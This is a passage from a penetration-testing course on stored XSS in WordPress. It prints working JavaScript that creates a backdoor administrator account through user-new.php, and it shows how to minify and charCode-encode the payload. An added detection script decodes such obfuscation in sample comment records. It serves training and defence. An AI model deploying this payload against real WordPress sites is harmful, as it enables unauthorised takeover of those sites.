Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
This function performs a new HTTP request towards the /wp-admin/user-new.php URL and saves the nonce value found in the HTTP response based on the regular expression. The regex pattern matches any alphanumeric value contained between the string /ser" value=" and double quotes.
Now that we've dynamically retrieved the nonce, we can craft the main function responsible for creating the new admin user.
    // requestURL (/wp-admin/user-new.php) and nonce are set by the earlier part of the listing
    var params = "action=createuser&_wpnonce_create-user=" + nonce +
        "&user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2=attackerpass&role=administrator";
    ajaxRequest = new XMLHttpRequest();
    ajaxRequest.open("POST", requestURL, true);
    ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    ajaxRequest.send(params);
Listing 125 - Creating a New WordPress Administrator Account
The parameters for the new backdoored admin account (user_login, email, pass1, pass2 and role) appear in this function just after the nonce we obtained previously. If our attack succeeds, we'll be able to gain administrative access to the entire WordPress installation.
To ensure that our JavaScript payload will be handled correctly by Burp and the target application, we need to first minify it, then encode it.
To minify our attack code into a one-liner, we can navigate to JS Compress (JSCompress.com, 2022), https://jscompress.com/.
Figure 116: Minifying the XSS attack code
Once we have clicked on Compress JavaScript, we'll copy the output and save it locally.
As a final attack step, we are going to encode the minified JavaScript code, so any bad characters won't interfere with sending the payload. We can do this using the following function:
    function encode_to_javascript(string) {
        var input = string;
        var output = '';
        for (var pos = 0; pos < input.length; pos++) {
            // comma-separated character codes, to be passed to String.fromCharCode()
            output += input.charCodeAt(pos) + (pos < input.length - 1 ? ',' : '');
        }
        return output;
    }
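The encoding above is reversible, and that is exactly what an analyst reviewing stored content does when triaging this kind of payload. The following script is an added example written for this page and is not part of the PWK course material: it decodes String.fromCharCode(...) obfuscation found in sample post or comment records and flags entries that reference the admin-creation endpoint and parameters described above. The record set, the indicator list and the helper names (decodeCharCodes, toCharCodeCall, analyzeRecord, scan) are all constructed for this example.

```javascript
// Added example, not from the PWK course: decode String.fromCharCode(...)
// obfuscation in stored content and flag admin-creation indicators.

// Matches String.fromCharCode( n, n, n ) with a comma-separated list of decimal codes.
const CHARCODE_RE = /String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g;

// Indicator strings taken from the attack flow on the page; constructed list.
const INDICATORS = [
  "user-new.php",
  "action=createuser",
  "role=administrator",
  "XMLHttpRequest",
];

// Replace every String.fromCharCode(...) call with the text it would produce.
function decodeCharCodes(text) {
  return text.replace(CHARCODE_RE, (_match, list) =>
    list.split(",").map((n) => String.fromCharCode(parseInt(n.trim(), 10))).join("")
  );
}

// Helper used only to build the constructed sample below; mirrors the page's encoder.
function toCharCodeCall(source) {
  return "String.fromCharCode(" + Array.from(source, (c) => c.charCodeAt(0)).join(",") + ")";
}

// Constructed sample records, as they might be pulled from a comments table or a WAF log.
const SAMPLE_RECORDS = [
  { id: 1, body: "Great post, thanks!" },
  {
    id: 2,
    body: "<script>eval(" +
      toCharCodeCall('var r=new XMLHttpRequest();r.open("POST","/wp-admin/user-new.php",true);') +
      ")</script>",
  },
  { id: 3, body: '<a href="https://example.com">link</a>' },
  { id: 4, body: "Say String.fromCharCode(72,105) to me" },
];

// Decode one record and report whether it was obfuscated and which indicators appear.
function analyzeRecord(record) {
  const decoded = decodeCharCodes(record.body);
  return {
    id: record.id,
    obfuscated: decoded !== record.body,
    hits: INDICATORS.filter((i) => decoded.includes(i)),
    decoded,
  };
}

// Keep only records that were obfuscated or contain an indicator string.
function scan(records) {
  return records.map(analyzeRecord).filter((r) => r.obfuscated || r.hits.length > 0);
}

for (const r of scan(SAMPLE_RECORDS)) {
  console.log(`record ${r.id}: obfuscated=${r.obfuscated} hits=${r.hits.join("|") || "none"}`);
}
```

Record 4 shows why decoding and indicator matching are reported separately: a charCode call in benign text is still worth a look, but only the decoded content referencing user-new.php or the createuser action points at the account-creation technique the page describes.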